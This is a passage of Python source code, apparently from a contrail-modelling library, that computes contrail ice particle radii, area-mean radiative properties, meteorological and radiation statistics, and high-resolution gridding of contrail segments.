np.nanmean(flight_waypoints.filter(is_persistent)[\"engine_efficiency\"])\n if np.any(is_persistent)\n else np.nan\n ),\n \"mean_nvpm_ei_n_all_flights\": np.nanmean(flight_waypoints[\"nvpm_ei_n\"]),\n \"mean_nvpm_ei_n_flights_with_persistent_contrails\": (\n np.nanmean(flight_waypoints.filter(is_persistent)[\"nvpm_ei_n\"])\n if np.any(is_persistent)\n else np.nan\n ),\n # Contrail properties at `time_end`\n \"mean_contrail_age\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"age\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"max_contrail_age\": (\n np.nanmax(contrails.filter(is_at_t_end)[\"age\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"mean_n_ice_per_m\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"n_ice_per_m\"])\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_contrail_ice_water_path\": (\n area_mean_ice_water_path(\n contrails.filter(is_at_t_end)[\"iwc\"],\n contrails.filter(is_at_t_end)[\"plume_mass_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"area_mean_contrail_ice_radius\": (\n area_mean_ice_particle_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"volume_mean_contrail_ice_radius\": (\n volume_mean_ice_particle_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_contrail_ice_effective_radius\": (\n mean_ice_particle_effective_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_tau_contrail\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"tau_contrail\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_tau_cirrus\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"tau_cirrus\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n # Contrail climate forcing\n \"mean_rf_sw\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_sw\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_rf_lw\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_lw\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_rf_net\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_net\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"total_contrail_ef\": np.nansum(contrails[\"ef\"]) if np.any(is_at_t_end) else np.nan,\n # Meteorology statistics\n \"issr_percentage_coverage\": (\n (met_stats[\"issr_percentage_coverage\"]) if met is not None else np.nan\n ),\n \"mean_rhi_in_issr\": met_stats[\"mean_rhi_in_issr\"] if met is not None else np.nan,\n 
\"contrail_cirrus_percentage_coverage\": (\n            (met_stats[\"contrail_cirrus_percentage_coverage\"]) if met is not None else np.nan\n        ),\n        \"contrail_cirrus_clear_sky_percentage_coverage\": (\n            (met_stats[\"contrail_cirrus_clear_sky_percentage_coverage\"])\n            if met is not None\n            else np.nan\n        ),\n        \"natural_cirrus_percentage_coverage\": (\n            (met_stats[\"natural_cirrus_percentage_coverage\"]) if met is not None else np.nan\n        ),\n        \"cloud_contrail_overlap_percentage\": (\n            percentage_cloud_contrail_overlap(\n                met_stats[\"contrail_cirrus_percentage_coverage\"],\n                met_stats[\"contrail_cirrus_clear_sky_percentage_coverage\"],\n            )\n            if met is not None\n            else np.nan\n        ),\n        # Radiation statistics\n        \"mean_sdr_domain\": rad_stats[\"mean_sdr_domain\"] if rad is not None else np.nan,\n        \"mean_sdr_at_contrail_wypts\": (\n            np.nanmean(contrails.filter(is_at_t_end)[\"sdr\"]) if np.any(is_at_t_end) else np.nan\n        ),\n        \"mean_rsr_domain\": rad_stats[\"mean_rsr_domain\"] if rad is not None else np.nan,\n        \"mean_rsr_at_contrail_wypts\": (\n            np.nanmean(contrails.filter(is_at_t_end)[\"rsr\"]) if np.any(is_at_t_end) else np.nan\n        ),\n        \"mean_olr_domain\": rad_stats[\"mean_olr_domain\"] if rad is not None else np.nan,\n        \"mean_olr_at_contrail_wypts\": (\n            np.nanmean(contrails.filter(is_at_t_end)[\"olr\"]) if np.any(is_at_t_end) else np.nan\n        ),\n        \"mean_albedo_at_contrail_wypts\": (\n            np.nanmean(\n                albedo(contrails.filter(is_at_t_end)[\"sdr\"], contrails.filter(is_at_t_end)[\"rsr\"])\n            )\n            if np.any(is_at_t_end)\n            else np.nan\n        ),\n    }\n    return pd.Series(stats_t)
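\n\n\n# `time_slice_statistics` is typically evaluated repeatedly over consecutive time\n# slices. A sketch (illustrative only; the time range is hypothetical, and\n# ``scaling`` is assumed to be the same HumidityScaling instance used in\n# ``CocipParams``):\n\n\ndef _example_hourly_statistics(waypoints, contrails, scaling, met, rad):\n    \"\"\"Accumulate hourly summary rows into a single DataFrame (illustrative sketch).\"\"\"\n    times = pd.date_range(\"2022-01-01 00:00\", \"2022-01-01 06:00\", freq=\"1h\")\n    rows = [\n        time_slice_statistics(\n            t_start,\n            t_end,\n            waypoints,\n            contrails,\n            humidity_scaling=scaling,\n            met=met,\n            rad=rad,\n        )\n        for t_start, t_end in zip(times[:-1], times[1:])\n    ]\n    return pd.DataFrame(rows)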
\n\n\ndef meteorological_time_slice_statistics(\n    time: np.datetime64 | pd.Timestamp,\n    contrails: GeoVectorDataset,\n    met: MetDataset,\n    humidity_scaling: HumidityScaling,\n    cirrus_coverage: MetDataset | None = None,\n) -> pd.Series:\n    \"\"\"\n    Calculate meteorological statistics in the domain provided.\n\n    Parameters\n    ----------\n    time : np.datetime64 | pd.Timestamp\n        Time at which the meteorological statistics are computed.\n    contrails : GeoVectorDataset\n        Contrail waypoints containing `tau_contrail`.\n    met : MetDataset\n        Pressure level dataset containing 'air_temperature', 'specific_humidity',\n        'specific_cloud_ice_water_content', and 'geopotential'\n    humidity_scaling : HumidityScaling\n        Humidity scaling methodology.\n        See :attr:`CocipParams.humidity_scaling`\n    cirrus_coverage : MetDataset | None\n        Single level dataset containing the contrail and natural cirrus coverage, including\n        `cc_contrails_clear_sky`, `cc_natural_cirrus`, `cc_contrails`\n\n    Returns\n    -------\n    pd.Series\n        Mean ISSR characteristics, and the percentage of contrail and natural cirrus coverage in\n        domain area.\n    \"\"\"\n    # Ensure vars\n    met.ensure_vars(\n        (\"air_temperature\", \"specific_humidity\", \"specific_cloud_ice_water_content\", \"geopotential\")\n    )\n\n    # ISSR: Volume of airspace with RHi > 100% between FL300 and FL450\n    met = humidity_scaling.eval(met)\n    rhi = met[\"rhi\"].data.sel(level=slice(150, 300))\n    is_issr = rhi > 1\n\n    # Cirrus in a longitude-latitude grid\n    if cirrus_coverage is None:\n        cirrus_coverage = cirrus_coverage_single_level(time, met, contrails)\n\n    # Calculate statistics\n    area = geo.grid_surface_area(met[\"longitude\"].values, met[\"latitude\"].values)\n    weights = area / np.nansum(area)\n\n    stats = {\n        \"issr_percentage_coverage\": (\n            np.nansum((is_issr * weights)) / (np.nansum(weights) * len(rhi.level))\n        ) * 100,\n        \"mean_rhi_in_issr\": np.nanmean(rhi.values[is_issr.values]),\n        \"contrail_cirrus_percentage_coverage\": (\n            np.nansum((area * cirrus_coverage[\"contrails\"].data)) / np.nansum(area)\n        ) * 100,\n        \"contrail_cirrus_clear_sky_percentage_coverage\": (\n            np.nansum((area * cirrus_coverage[\"contrails_clear_sky\"].data)) / np.nansum(area)\n        ) * 100,\n        \"natural_cirrus_percentage_coverage\": (\n            np.nansum((area * cirrus_coverage[\"natural_cirrus\"].data)) / np.nansum(area)\n        ) * 100,\n    }\n    return pd.Series(stats)\n\n\ndef radiation_time_slice_statistics(\n    rad: MetDataset, time: np.datetime64 | pd.Timestamp\n) -> pd.Series:\n    \"\"\"\n    Calculate radiation statistics in the domain provided.\n\n    Parameters\n    ----------\n    rad : MetDataset\n        Single level dataset containing the `sdr`, `rsr` and `olr`.\n    time : np.datetime64 | pd.Timestamp\n        Time at which the radiation statistics are computed.\n\n    Returns\n    -------\n    pd.Series\n        Mean SDR, RSR and OLR in domain area.\n    \"\"\"\n    rad.ensure_vars((\"sdr\", \"rsr\", \"olr\"))\n    surface_area = geo.grid_surface_area(rad[\"longitude\"].values, rad[\"latitude\"].values)\n    weights = surface_area.values / np.nansum(surface_area)\n    stats = {\n        \"mean_sdr_domain\": np.nansum(rad[\"sdr\"].data.sel(level=-1, time=time).values * weights),\n        \"mean_rsr_domain\": np.nansum(rad[\"rsr\"].data.sel(level=-1, time=time).values * weights),\n        \"mean_olr_domain\": np.nansum(rad[\"olr\"].data.sel(level=-1, time=time).values * weights),\n    }\n    return pd.Series(stats)\n\n\ndef area_mean_ice_water_path(\n    iwc: npt.NDArray[np.float_],\n    plume_mass_per_m: npt.NDArray[np.float_],\n    segment_length: npt.NDArray[np.float_],\n    domain_area: float,\n) -> float:\n    \"\"\"\n    Calculate area-mean contrail ice water path.\n\n    Ice water path (IWP) is the contrail ice mass divided by the domain area of interest.\n\n    Parameters\n    ----------\n    iwc : npt.NDArray[np.float_]\n        Contrail ice water content, i.e., contrail ice mass per kg of\n        air, [:math:`kg_{H_{2}O}/kg_{air}`]\n    plume_mass_per_m : npt.NDArray[np.float_]\n        Contrail plume mass per unit length, [:math:`kg m^{-1}`]\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n    domain_area : float\n        Domain surface area, [:math:`m^{2}`]\n\n    Returns\n    -------\n    float\n        Mean contrail ice water path, [:math:`kg m^{-2}`]\n    \"\"\"\n    return np.nansum(iwc * plume_mass_per_m * segment_length) / domain_area\n\n\ndef area_mean_ice_particle_radius(\n    r_ice_vol: npt.NDArray[np.float_],\n    n_ice_per_m: npt.NDArray[np.float_],\n    segment_length: npt.NDArray[np.float_],\n) -> float:\n    r\"\"\"\n    Calculate the area-mean contrail ice particle radius.\n\n    Parameters\n    ----------\n    r_ice_vol : npt.NDArray[np.float_]\n        Ice particle volume mean radius for each waypoint, [:math:`m`]\n    n_ice_per_m : npt.NDArray[np.float_]\n        Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n\n    Returns\n    -------\n    float\n        Area-mean contrail ice particle radius `r_area`, [:math:`\\mu m`]\n\n    Notes\n    -----\n    - Re-arranged from `tot_ice_cross_sec_area` = `tot_n_ice_particles` * (np.pi * `r_ice_vol`**2)\n    - Assumes that the contrail ice crystals are spherical.\n    \"\"\"\n    tot_ice_cross_sec_area = _total_ice_particle_cross_sectional_area(\n        r_ice_vol, n_ice_per_m, segment_length\n    )\n    tot_n_ice_particles = _total_ice_particle_number(n_ice_per_m, segment_length)\n    return (tot_ice_cross_sec_area / (np.pi * tot_n_ice_particles)) ** (1 / 2) * 10**6\n\n\ndef volume_mean_ice_particle_radius(\n    r_ice_vol: npt.NDArray[np.float_],\n    n_ice_per_m: npt.NDArray[np.float_],\n    
segment_length: npt.NDArray[np.float_],\n) -> float:\n r\"\"\"\n Calculate the volume-mean contrail ice particle radius.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Volume-mean contrail ice particle radius `r_vol`, [:math:`\\mu m`]\n\n Notes\n -----\n - Re-arranged from `tot_ice_vol` = `tot_n_ice_particles` * (4 / 3 * np.pi * `r_ice_vol`**3)\n - Assumes that the contrail ice crystals are spherical.\n \"\"\"\n tot_ice_vol = _total_ice_particle_volume(r_ice_vol, n_ice_per_m, segment_length)\n tot_n_ice_particles = _total_ice_particle_number(n_ice_per_m, segment_length)\n return (tot_ice_vol / ((4 / 3) * np.pi * tot_n_ice_particles)) ** (1 / 3) * 10**6\n\n\ndef mean_ice_particle_effective_radius(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n r\"\"\"\n Calculate the mean contrail ice particle effective radius.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Mean contrail ice particle effective radius `r_eff`, [:math:`\\mu m`]\n\n Notes\n -----\n - `r_eff` is the ratio of the particle volume to particle projected area.\n - `r_eff` = (3 / 4) * (`tot_ice_vol` / `tot_ice_cross_sec_area`)\n - See Eq. 
(62) of :cite:`schumannContrailCirrusPrediction2012`.\n    \"\"\"\n    tot_ice_vol = _total_ice_particle_volume(r_ice_vol, n_ice_per_m, segment_length)\n    tot_ice_cross_sec_area = _total_ice_particle_cross_sectional_area(\n        r_ice_vol, n_ice_per_m, segment_length\n    )\n    return (3 / 4) * (tot_ice_vol / tot_ice_cross_sec_area) * 10**6\n\n\ndef _total_ice_particle_cross_sectional_area(\n    r_ice_vol: npt.NDArray[np.float_],\n    n_ice_per_m: npt.NDArray[np.float_],\n    segment_length: npt.NDArray[np.float_],\n) -> float:\n    \"\"\"\n    Calculate total contrail ice particle cross-sectional area.\n\n    Parameters\n    ----------\n    r_ice_vol : npt.NDArray[np.float_]\n        Ice particle volume mean radius for each waypoint, [:math:`m`]\n    n_ice_per_m : npt.NDArray[np.float_]\n        Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n\n    Returns\n    -------\n    float\n        Total ice particle cross-sectional area from all contrail waypoints, [:math:`m^{2}`]\n    \"\"\"\n    ice_cross_sec_area = 0.9 * np.pi * r_ice_vol**2\n    return np.nansum(ice_cross_sec_area * n_ice_per_m * segment_length)\n\n\ndef _total_ice_particle_volume(\n    r_ice_vol: npt.NDArray[np.float_],\n    n_ice_per_m: npt.NDArray[np.float_],\n    segment_length: npt.NDArray[np.float_],\n) -> float:\n    \"\"\"\n    Calculate total contrail ice particle volume.\n\n    Parameters\n    ----------\n    r_ice_vol : npt.NDArray[np.float_]\n        Ice particle volume mean radius for each waypoint, [:math:`m`]\n    n_ice_per_m : npt.NDArray[np.float_]\n        Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n\n    Returns\n    -------\n    float\n        Total ice particle volume from all contrail waypoints, [:math:`m^{3}`]\n    \"\"\"\n    ice_vol = (4 / 3) * np.pi * r_ice_vol**3\n    return np.nansum(ice_vol * n_ice_per_m * segment_length)\n\n\ndef _total_ice_particle_number(\n    n_ice_per_m: npt.NDArray[np.float_], segment_length: npt.NDArray[np.float_]\n) -> float:\n    \"\"\"\n    Calculate total number of contrail ice particles.\n\n    Parameters\n    ----------\n    n_ice_per_m : npt.NDArray[np.float_]\n        Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n\n    Returns\n    -------\n    float\n        Total number of ice particles from all contrail waypoints.\n    \"\"\"\n    return np.nansum(n_ice_per_m * segment_length)\n\n\ndef area_mean_contrail_property(\n    contrail_property: npt.NDArray[np.float_],\n    segment_length: npt.NDArray[np.float_],\n    width: npt.NDArray[np.float_],\n    domain_area: float,\n) -> float:\n    \"\"\"\n    Calculate area mean contrail property.\n\n    Used to calculate the area mean `tau_contrail`, `tau_cirrus`, `sdr`, `rsr`, `olr`, `rf_sw`,\n    `rf_lw` and `rf_net`.\n\n    Parameters\n    ----------\n    contrail_property : npt.NDArray[np.float_]\n        Selected contrail property for each waypoint\n    segment_length : npt.NDArray[np.float_]\n        Contrail segment length for each waypoint, [:math:`m`]\n    width : npt.NDArray[np.float_]\n        Contrail width for each waypoint, [:math:`m`]\n    domain_area : float\n        Domain surface area, [:math:`m^{2}`]\n\n    Returns\n    -------\n    float\n        Area mean contrail property\n    \"\"\"\n    return np.nansum(contrail_property * segment_length * width) / domain_area
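\n\n\n# A self-contained numerical check of the ice-radius helpers above on a synthetic\n# two-waypoint contrail (illustrative values only). All three helpers return\n# radii in micrometres:\n\n\ndef _example_ice_radii():\n    \"\"\"Evaluate the ice-radius helpers on synthetic data (illustrative sketch).\"\"\"\n    r_ice_vol = np.array([4.0e-6, 6.0e-6])  # volume mean radius, [m]\n    n_ice_per_m = np.array([1.0e12, 5.0e11])  # ice particles per metre, [1/m]\n    segment_length = np.array([10000.0, 10000.0])  # [m]\n    return {\n        \"r_area\": area_mean_ice_particle_radius(r_ice_vol, n_ice_per_m, segment_length),\n        \"r_vol\": volume_mean_ice_particle_radius(r_ice_vol, n_ice_per_m, segment_length),\n        \"r_eff\": mean_ice_particle_effective_radius(r_ice_vol, n_ice_per_m, segment_length),\n    }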
\n\n\ndef percentage_cloud_contrail_overlap(\n    contrail_cover: float | np.ndarray, contrail_cover_clear_sky: float | np.ndarray\n) -> float | np.ndarray:\n    \"\"\"\n    Calculate the percentage area of cloud-contrail overlap.\n\n    Parameters\n    ----------\n    contrail_cover : float | np.ndarray\n        Percentage of contrail cirrus cover without overlap with natural cirrus.\n        See `cirrus_coverage_single_level` function.\n    contrail_cover_clear_sky : float | np.ndarray\n        Percentage of contrail cirrus cover in clear sky conditions.\n        See `cirrus_coverage_single_level` function.\n\n    Returns\n    -------\n    float | np.ndarray\n        Percentage of cloud-contrail overlap\n    \"\"\"\n    return np.where(\n        contrail_cover_clear_sky > 0,\n        100 - (contrail_cover / contrail_cover_clear_sky * 100),\n        0,\n    )\n\n\n# ---------------------------------------\n# High resolution grid: contrail segments\n# ---------------------------------------\n\n\ndef contrails_to_hi_res_grid(\n    time: pd.Timestamp | np.datetime64,\n    contrails_t: GeoVectorDataset,\n    *,\n    var_name: str,\n    spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n    spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n    r\"\"\"\n    Aggregate contrail segments to a high-resolution longitude-latitude grid.\n\n    Parameters\n    ----------\n    time : pd.Timestamp | np.datetime64\n        UTC time of interest.\n    contrails_t : GeoVectorDataset\n        All contrail waypoint outputs at `time`.\n    var_name : str\n        Contrail property for aggregation, where `var_name` must be included in `contrails_t`.\n        For example, `tau_contrail`, `rf_sw`, `rf_lw`, and `rf_net`\n    spatial_bbox : tuple[float, float, float, float]\n        Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n    spatial_grid_res : float\n        Spatial grid resolution, [:math:`\\deg`]\n\n    Returns\n    -------\n    xr.DataArray\n        Contrail segments and their properties aggregated to a longitude-latitude grid.\n    \"\"\"\n    # Ensure the required columns are included in `contrails_t`\n    cols_req = [\n        \"flight_id\",\n        \"waypoint\",\n        \"longitude\",\n        \"latitude\",\n        \"altitude\",\n        \"time\",\n        \"sin_a\",\n        \"cos_a\",\n        \"width\",\n        \"continuous\",\n        var_name,\n    ]\n    contrails_t.ensure_vars(cols_req)\n\n    # Ensure that the times in `contrails_t` are the same.\n    is_in_time = contrails_t[\"time\"] == time\n    if not np.all(is_in_time):\n        warnings.warn(\n            f\"Contrails have inconsistent times. 
Waypoints that are not at {time} are removed.\"\n        )\n        contrails_t = contrails_t.filter(is_in_time)\n\n    main_grid = _initialise_longitude_latitude_grid(spatial_bbox, spatial_grid_res)\n\n    # Contrail heads and tails: continuous segments only\n    heads_t = contrails_t.dataframe\n    heads_t.sort_values([\"flight_id\", \"waypoint\"], inplace=True)\n    tails_t = heads_t.shift(periods=-1)\n\n    is_continuous = heads_t[\"continuous\"]\n    heads_t = heads_t[is_continuous].copy()\n    tails_t = tails_t[is_continuous].copy()\n    tails_t[\"waypoint\"] = tails_t[\"waypoint\"].astype(\"int\")\n\n    heads_t.set_index([\"flight_id\", \"waypoint\"], inplace=True, drop=False)\n    tails_t.index = heads_t.index\n\n    # Aggregate contrail segments to a high resolution longitude-latitude grid\n    try:\n        from tqdm.auto import tqdm\n    except ModuleNotFoundError as exc:\n        raise ModuleNotFoundError(\"Install the 'tqdm' package\") from exc\n\n    for i in tqdm(heads_t.index):\n        contrail_segment = GeoVectorDataset(\n            pd.concat([heads_t[cols_req].loc[i], tails_t[cols_req].loc[i]], axis=1).T, copy=True\n        )\n\n        segment_grid = segment_property_to_hi_res_grid(\n            contrail_segment, var_name=var_name, spatial_grid_res=spatial_grid_res\n        )\n        main_grid = _add_segment_to_main_grid(main_grid, segment_grid)\n\n    return main_grid\n\n\ndef _initialise_longitude_latitude_grid(\n    spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n    spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n    r\"\"\"\n    Create longitude-latitude grid of specified coordinates and spatial resolution.\n\n    Parameters\n    ----------\n    spatial_bbox : tuple[float, float, float, float]\n        Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n    spatial_grid_res : float\n        Spatial grid resolution, [:math:`\\deg`]\n\n    Returns\n    -------\n    xr.DataArray\n        Longitude-latitude grid of specified coordinates and spatial resolution, filled with zeros.\n\n    Notes\n    -----\n    This empty grid is used to store the aggregated contrail properties of the individual\n    contrail segments, such as the gridded contrail optical depth and radiative forcing.\n    \"\"\"\n    lon_coords = np.arange(spatial_bbox[0], spatial_bbox[2] + spatial_grid_res, spatial_grid_res)\n    lat_coords = np.arange(spatial_bbox[1], spatial_bbox[3] + spatial_grid_res, spatial_grid_res)\n    return xr.DataArray(\n        np.zeros((len(lon_coords), len(lat_coords))),\n        dims=[\"longitude\", \"latitude\"],\n        coords={\"longitude\": lon_coords, \"latitude\": lat_coords},\n    )
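\n\n\n# Usage sketch for the high-resolution gridder above (illustrative only; the\n# timestamp is hypothetical): contrail waypoints at a single time are projected\n# onto a 0.05 degree grid. ``contrails`` is assumed to be the `Cocip.contrail`\n# output as a GeoVectorDataset.\n\n\ndef _example_hi_res_tau(contrails):\n    \"\"\"Grid `tau_contrail` at one time step (illustrative sketch).\"\"\"\n    t = pd.Timestamp(\"2022-01-01 02:00\")\n    contrails_t = contrails.filter(contrails[\"time\"] == t)\n    return contrails_to_hi_res_grid(\n        t, contrails_t, var_name=\"tau_contrail\", spatial_grid_res=0.05\n    )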
\n\n\ndef segment_property_to_hi_res_grid(\n    contrail_segment: GeoVectorDataset,\n    *,\n    var_name: str,\n    spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n    r\"\"\"\n    Convert the contrail segment property to a high-resolution longitude-latitude grid.\n\n    Parameters\n    ----------\n    contrail_segment : GeoVectorDataset\n        Contrail segment waypoints (head and tail).\n    var_name : str\n        Contrail property of interest, where `var_name` must be included in `contrail_segment`.\n        For example, `tau_contrail`, `rf_sw`, `rf_lw`, and `rf_net`\n    spatial_grid_res : float\n        Spatial grid resolution, [:math:`\\deg`]\n\n    Returns\n    -------\n    xr.DataArray\n        Contrail segment dimension and property projected to a longitude-latitude grid.\n\n    Notes\n    -----\n    - See Appendix A11 and A12 of :cite:`schumannContrailCirrusPrediction2012`.\n    \"\"\"\n    # Ensure that `contrail_segment` contains the required variables\n    contrail_segment.ensure_vars((\"sin_a\", \"cos_a\", \"width\", var_name))\n\n    # Ensure that `contrail_segment` contains exactly two waypoints with the same time.\n    assert len(contrail_segment) == 2\n    assert contrail_segment[\"time\"][0] == contrail_segment[\"time\"][1]\n\n    # Calculate contrail edges\n    (\n        contrail_segment[\"lon_edge_l\"],\n        contrail_segment[\"lat_edge_l\"],\n        contrail_segment[\"lon_edge_r\"],\n        contrail_segment[\"lat_edge_r\"],\n    ) = contrail_edges(\n        contrail_segment[\"longitude\"],\n        contrail_segment[\"latitude\"],\n        contrail_segment[\"sin_a\"],\n        contrail_segment[\"cos_a\"],\n        contrail_segment[\"width\"],\n    )\n\n    # Initialise contrail segment grid with spatial domain that covers the contrail area.\n    lon_edges = np.concatenate(\n        [contrail_segment[\"lon_edge_l\"], contrail_segment[\"lon_edge_r\"]], axis=0\n    )\n    lat_edges = np.concatenate(\n        [contrail_segment[\"lat_edge_l\"], contrail_segment[\"lat_edge_r\"]], axis=0\n    )\n    spatial_bbox = geo.spatial_bounding_box(lon_edges, lat_edges, buffer=0.5)\n    segment_grid = _initialise_longitude_latitude_grid(spatial_bbox, spatial_grid_res)\n\n    # Calculate gridded contrail segment properties\n    weights = _pixel_weights(contrail_segment, segment_grid)\n    dist_perpendicular = _segment_perpendicular_distance_to_pixels(contrail_segment, weights)\n    plume_concentration = _gaussian_plume_concentration(\n        contrail_segment, weights, dist_perpendicular\n    )\n\n    # Distribute selected contrail property to grid: linear interpolation between\n    # the head (weight 0) and tail (weight 1) values, scaled by plume concentration\n    return plume_concentration * (\n        weights * contrail_segment[var_name][1]\n        + (1 - weights) * contrail_segment[var_name][0]\n    )\n\n\ndef _pixel_weights(contrail_segment: GeoVectorDataset, segment_grid: xr.DataArray) -> xr.DataArray:\n    \"\"\"\n    Calculate the pixel weights for `segment_grid`.\n\n    Parameters\n    ----------\n    contrail_segment : GeoVectorDataset\n        Contrail segment waypoints (head and tail).\n    segment_grid : xr.DataArray\n        Contrail segment grid with spatial domain that covers the contrail area.\n\n    Returns\n    -------\n    xr.DataArray\n        Pixel weights for `segment_grid`\n\n    Notes\n    -----\n    - See Appendix A12 of :cite:`schumannContrailCirrusPrediction2012`.\n    - Each weight is the normalised projection of the pixel position onto the contrail\n      segment, measured from the segment head (0 at the head, 1 at the tail).\n    - The contrail segment does not contribute to a pixel if its weight is < 0 or > 1.\n    \"\"\"\n    head = contrail_segment.dataframe.iloc[0]\n    tail = contrail_segment.dataframe.iloc[1]\n\n    # Calculate determinant (squared segment length)\n    dx = units.longitude_distance_to_m(\n        (tail[\"longitude\"] - head[\"longitude\"]),\n        0.5 * (head[\"latitude\"] + tail[\"latitude\"]),\n    )\n    dy = units.latitude_distance_to_m(tail[\"latitude\"] - head[\"latitude\"])\n    det = dx**2 + dy**2\n\n    # Calculate pixel weights\n    lon_grid, lat_grid = np.meshgrid(\n        segment_grid[\"longitude\"].values, segment_grid[\"latitude\"].values\n    )\n    dx_grid = units.longitude_distance_to_m(\n        (lon_grid - head[\"longitude\"]),\n        0.5 * (head[\"latitude\"] + lat_grid),\n    )\n    dy_grid = units.latitude_distance_to_m((lat_grid - head[\"latitude\"]))\n    weights = (dx * dx_grid + dy * dy_grid) / det\n    return xr.DataArray(\n        data=weights.T,\n        dims=[\"longitude\", \"latitude\"],\n        coords={\"longitude\": segment_grid[\"longitude\"], \"latitude\": segment_grid[\"latitude\"]},\n    )\n\n\ndef _segment_perpendicular_distance_to_pixels(\n    contrail_segment: GeoVectorDataset, weights: xr.DataArray\n) -> xr.DataArray:\n    \"\"\"\n    Calculate perpendicular distance from contrail segment to each segment grid pixel.\n\n    Parameters\n    ----------\n    contrail_segment : GeoVectorDataset\n        Contrail segment waypoints (head and tail).\n    weights : xr.DataArray\n        Pixel 
weights for `segment_grid`.\n        See `_pixel_weights` function.\n\n    Returns\n    -------\n    xr.DataArray\n        Perpendicular distance from contrail segment to each segment grid pixel, [:math:`m`]\n\n    Notes\n    -----\n    - See Figure A7 of :cite:`schumannContrailCirrusPrediction2012`.\n    \"\"\"\n    head = contrail_segment.dataframe.iloc[0]\n    tail = contrail_segment.dataframe.iloc[1]\n\n    # Longitude and latitude along contrail segment\n    lon_grid, lat_grid = np.meshgrid(weights[\"longitude\"].values, weights[\"latitude\"].values)\n\n    lon_s = head[\"longitude\"] + weights.T.values * (tail[\"longitude\"] - head[\"longitude\"])\n    lat_s = head[\"latitude\"] + weights.T.values * (tail[\"latitude\"] - head[\"latitude\"])\n\n    lon_dist = units.longitude_distance_to_m(np.abs(lon_grid - lon_s), 0.5 * (lat_s + lat_grid))\n    lat_dist = units.latitude_distance_to_m(np.abs(lat_grid - lat_s))\n    dist_perp = (lon_dist**2 + lat_dist**2) ** 0.5\n    return xr.DataArray(dist_perp.T, coords=weights.coords)\n\n\ndef _gaussian_plume_concentration(\n    contrail_segment: GeoVectorDataset,\n    weights: xr.DataArray,\n    dist_perpendicular: xr.DataArray,\n) -> xr.DataArray:\n    \"\"\"\n    Calculate relative Gaussian plume concentration along the contrail width.\n\n    Parameters\n    ----------\n    contrail_segment : GeoVectorDataset\n        Contrail 